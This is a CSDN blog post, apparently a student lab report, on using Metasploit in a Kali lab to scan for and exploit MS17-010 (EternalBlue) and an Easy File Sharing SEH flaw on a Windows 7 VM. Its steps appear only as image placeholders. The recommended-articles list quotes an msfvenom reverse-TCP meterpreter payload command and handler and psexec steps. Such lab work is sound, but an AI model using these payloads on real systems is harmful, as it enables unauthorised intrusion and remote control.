kali渗透攻击

最新推荐文章于 2024-06-15 10:22:15 发布
最新推荐文章于 2024-06-15 10:22:15 发布
阅读量1.7k 收藏 31
点赞数 27
文章标签: 安全 web安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tanjing7584239/article/details/137602895
版权
本文详细介绍了Metasploit的基础知识,包括启动方式、常用模块和基本命令,以及如何使用Metasploit对操作系统和软件发起攻击,涉及MS17_010漏洞检测、EasyFileSharing渗透等实例。
摘要由CSDN通过智能技术生成

文章目录

2022级计算机网络技术1班吕智毅

7.1 Metasploit的基础

1、Metasploit启动的三种方法:

(1)菜单

在这里插入图片描述

(2)工具栏

在这里插入图片描述

(3)命令行

在这里插入图片描述

2、Metasploit的常用模块:

(1)exploit(漏洞渗透模块)

在这里插入图片描述

(2)payload(攻击载荷模块)

在这里插入图片描述

(3)auxiliary(辅助模块)

在这里插入图片描述

(4)post(后渗透攻击模块)

在这里插入图片描述

3、帮助help和?

在这里插入图片描述

4、命令几个种类:

(1)核心命令core command

(2)模块命令module command

(3)任务命令job command

(4)资源命令resource script command

(5)数据库后台命令database backed command

(6)登录凭证后台命令credentials backed command

在这里插入图片描述
在这里插入图片描述

7.2 Metasploit的基本命令

最常用的几个命令:

(1)show 显示

在这里插入图片描述
在这里插入图片描述

(2)search 搜索

在这里插入图片描述
在这里插入图片描述

(3)use 使用(某模块)

在这里插入图片描述

7.3 使用Metasploit对操作系统发起攻击

实验环境:填写如下IP地址
Kali 2主机IP: 192.168.137.137
靶机(64位windows 7,永恒之蓝靶机)IP: 192.168.137.40

1、使用metasploit的smb_ms17_010检测脚本,确定目标系统是否存在ms17_010漏洞。

(1)启动metasploit

在这里插入图片描述

(2)加载smb_ms17_010检测脚本

在这里插入图片描述

(3) 对目标主机进行扫描

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

2、查找针对MS17_010漏洞的渗透模块

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

3、载入ms17_010_eternalblue渗透模块,查看需要设置的参数并进行设置,启动模块。

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

4、启动模块

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

5、控制目标主机

(输入命令或操作过程、结果截图并进行必要说明)

在这里插入图片描述
在这里插入图片描述

7.4 使用Metasploit对软件发起攻击

实验环境:填写如下IP地址
Kali 2主机: 192.168.137.137
靶机(32位Windows 7,安装了Easy File Sharing HTTP Server)IP: 192.168.137.40

1、查找与EasyFileSharing有关的渗透模块

(1)启动Metarsploit

在这里插入图片描述

(2)查找与EasyFileSharing有关的渗透模块

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

3、在目标靶机启动Easy File Sharing.

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述

4、到kali中查看,会话成功建立了!

(输入命令或操作过程、结果截图并进行必要说明)
在这里插入图片描述
在这里插入图片描述

Kali渗透攻击学习心得体会:

自从我开始接触Kali Linux这一强大的渗透测试平台,我深感其魅力与挑战并存。Kali不仅提供了丰富的渗透测试工具,更是一个深入学习和实践网络安全的绝佳平台。通过这段时间的学习和实践,我收获颇丰,也深刻体会到了渗透测试的重要性与复杂性。

在学习Kali的过程中,我首先接触到了各种渗透测试工具的使用。从Nmap的端口扫描到Metasploit的自动化攻击,每一个工具都有其独特的功能和用途。通过不断地尝试和实践,我逐渐掌握了这些工具的使用方法,并能够在模拟环境中成功地进行渗透测试。然而,我也深知这些工具只是手段,真正的渗透测试需要深入理解和分析目标系统的安全漏洞。

在学习的过程中,我深刻体会到了网络安全的重要性。随着互联网的普及和技术的不断发展,网络安全问题日益突出。无论是个人用户还是企业机构,都需要高度重视网络安全问题,并采取有效的措施来防范潜在的攻击。通过渗透测试,我们可以发现系统中的安全漏洞,从而及时修复和加强安全防护。

我也意识到在进行渗透测试时需要严格遵守法律法规和道德规范。渗透测试的目的是为了发现和修复安全漏洞,而不是非法入侵和破坏。因此,在进行渗透测试之前,必须获得授权和许可,并严格遵守相关的法律法规和道德规范。否则,不仅可能导致法律责任,也会损害个人的声誉和信誉。

我还学到了如何在实际工作中应用渗透测试技能。在实际工作中,渗透测试往往需要结合具体的业务场景和安全需求来进行。因此,我们需要充分了解目标系统的业务逻辑和安全架构,并根据实际情况制定相应的渗透测试计划和策略。同时,我们还需要与团队成员密切合作,共同分析和解决安全问题。

回顾这段时间的学习经历,我深感自己在网络安全领域还有很长的路要走。未来,我将继续深入学习网络安全知识和技术,不断提高自己的渗透测试能力。同时,我也将积极参与实际项目的渗透测试工作,将所学知识应用到实践中去。

学习Kali渗透测试让我深刻体会到了网络安全的重要性和挑战性。通过不断学习和实践,我逐渐掌握了渗透测试的基本技能和方法,并能够在实际工作中应用这些技能来发现和解决安全问题。我相信在未来的学习和工作中,我会继续努力提高自己的网络安全水平,为网络安全事业做出更大的贡献。

胖头猫的100
关注
  • 27
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux DDos攻击、CC攻击、ARP攻击
qq_61901169的博客
06-03 2268
注:Kali官网下载可以直接打开的2023版本的虚拟机无法运行。
Kali常见攻击手段
热门推荐
weixin_45565886的博客
02-07 2万+
Kali常见攻击手段
Metasploit (MSF) 使用-包含基本使用、payload生成、后渗透模块使用
最新发布
zzz6583zz的博客
06-15 943
l, --list <type> 列出指定模块的所有可用资源,包括:payloads,encodes,nops,all-p, --payload <payload> 指定所需要使用的payload,也可以使用自定义payload,几乎支持全平台-f, --format <format> 指定输出格式-e, --encoder <encoder> 指定需要使用的encode,指定需要使用的编码。
Kali-利用metasploit中的exploit/multi/handler进行攻击
齐泽文的Blog
04-22 1万+
攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole &gt; use exploit/multi/handl...
Kali linux 2016.2(Rolling)中的Exploits模块详解
weixin_34205076的博客
05-22 3121
         简单来将,这个Exploits模块,就是针对不同的已知漏洞的利用程序。   root@kali:~# msfconsole Unable to handle kernel NULL pointer dereference at virtual addre...
kali:getsploit在线抓取exploit等内容
我的学习笔记
02-28 787
资源:https://github.com/vulnersCom/getsploitVulners数据库的命令行搜索和下载工具。 它允许您在线搜索所有最受欢迎的集合的漏洞利用:Exploit-DB,Metasploit,Packetstorm等。 最强大的功能是在您的工作路径中立即开发源代码下载。支持的python版本: python2.6, pytho...
Kali渗透工具 - metasploit
A_Z_dd的博客
06-01 801
初步使用及了解Kali渗透工具 - metasploit
kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1204
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
Kali Linux渗透测试技术详解
02-19
介绍了Linux安全透简介、安装及配置KaliLinux 操作系统、配置目标测试系统:第2篇为信息的收集及利用,介绍了信息收集、漏洞扫描、漏洞利用等技术:第3篇为各种渗透测试,介绍了权限提升、密码攻击、无线网络攻击、...
KaliLinux渗透测试五步曲
03-23
 第一步:侦察阶段在发动攻击之前,渗透测试者应当尽量多地了解目标环境和系统的特点。渗透测试者找到的目标信息越多,就越有更好的机会确认最容易和最快的成功方法。与白盒测试相比,黑盒测试要求进行更多的侦察...
kali Linux渗透基础知识.pdf
01-25
Kali Linux是一款专门为网络安全渗透测试设计的操作系统,包含了各种工具和软件,广泛用于合法的安全研究和漏洞评估。本文将详细介绍Kali Linux渗透基础知识中的关键环节——信息收集。 信息收集是渗透测试的第一...
KaliLinux安全渗透教程(完整版)
04-26
第9章 无线网络渗透测试 9.1 无线网络嗅探工具Kismet 9.2 使用Aircrack-ng工具破解无线网络 9.3 Gerix Wifi Cracker破解无线网络 9.4 使用Wifite破解无线网络 9.5 使用Easy-Creds工具攻击无线网络 9.6 在树莓派上...
基于Kali Linux的渗透测试.pdf
09-06
渗透测试是一种评估计算机网络系统安全的方法,通过模拟恶意黑客的攻击来识别安全问题。渗透测试可以对整个系统的硬、软件进行一次全面的侦探,能够在一定程度上保证系统的安全性。 2. 渗透测试的方法 渗透测试的...
kali linux漏洞,Kali Linux中升级exploit-db漏洞库
weixin_29813635的博客
05-16 1789
Kali Linux已经内置了一个由” Offebnsive Security”提供的漏洞利用程序集的数据库Exploit-DB,可以用于平时的参考和使用。访问的方法是在命令提示符中输入一下命令:# cd /pentest/exploits/exploitdb/# cat files.csv | less即可查看所有内置的漏洞利用程序集,这将会打开Exploit-DB在/pentest/explo...
攻击narak靶场
qq_62638044的博客
03-16 483
攻击narak靶场
Kali 基本命令大全
小司机的奥拓
01-29 2456
arch 显示机器的处理器架构(1)uname -m 显示机器的处理器架构(2)uname -r 显示正在使用的内核版本dmidecode -q 显示硬件系统部件- (SMBIOS / DMI)hdparm -i /dev/hda 罗列一个磁盘的架构特性hdparm -tT /dev/sda 在磁盘上执行测试性读取操作cat /proc/cpuinfo 显示CPU info 的信息cat /proc/interrupts 显示中断。
Kali常见攻击手段_kali攻击
分享Python知识
11-17 3481
Kali常见攻击手段_kali攻击
KaLi Linux渗透攻击
weixin_64531675的博客
06-12 3358
被动攻击的思路:渗透者构造一个攻击用的Web服务器,然后将这个Web服务器的网址发给目标用户,当目标用户使用有漏洞的浏览器打开这个网址时,攻击用的Web服务器就会向浏览器发送各种攻击脚本,如果其中某个攻击脚本攻击成功的话,就会在目标主机上建立一个meterpreter会话。使用browser_autopwn2模块可以建立一个攻击用的WEB服务器,这个服务器集成了多个浏览器漏洞,可以向浏览器发送各种攻击脚本,只要有一个攻击脚本攻击成功,即可建立会话。(将该网址复制到靶机中访问)
黑客自学(网络安全网络渗透攻击)kail黑客系统操作命令大全
互联网知识分享
08-11 799
这些操作命令和工具可以帮助黑客进行系统信息收集、文件和目录操作、系统管理、网络操作、端口扫描、漏洞扫描和利用、数据包分析、加密和解密、系统和网络安全、社会工程学、密码破解、数据库安全、网站安全、无线网络安全、逆向工程、命令注入、攻击、匿名和隐私保护、社交工具、信息收集、威胁情报、漏洞管理、密码管理、安全编程、威胁建模、恶意软件分析、反病毒软件、漏洞修复、安全日志管理、安全意识培训、威胁情报共享、渗透测试报告、代码审计、安全框架、安全策略、安全审计、安全风险评估、安全意识和安全升级等方面的操作。
kali渗透WiFi
10-11
对于Kali渗透WiFi的问题,我们需要先了解一些基本知识。Kali Linux是一个流行的渗透测试和网络安全评估操作系统,可以用于测试网络安全性并发现漏洞。当涉及到WiFi渗透时,有几种工具和技术可用,如Aircrack-ng、Reaver、Bully和Wifiphisher等。 最常见的技术是使用Aircrack-ng进行WiFi渗透攻击。这个工具可以用于破解WEP和WPA-PSK密码。WEP是一种不安全的协议,而WPA-PSK则更强大一些,因此需要更复杂的攻击。使用Aircrack-ng需要捕获被攻击网络的握手包,并将其传递给程序进行破解。 在使用Aircrack-ng之前,必须安装Kali Linux上的驱动程序,并将无线网卡设置为监控模式。然后,使用airodump-ng工具扫描网络并找到目标网络的BSSID和信道。然后,使用aireplay-ng工具进行数据包注入,以便生成握手包。最后,使用Aircrack-ng工具破解密码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值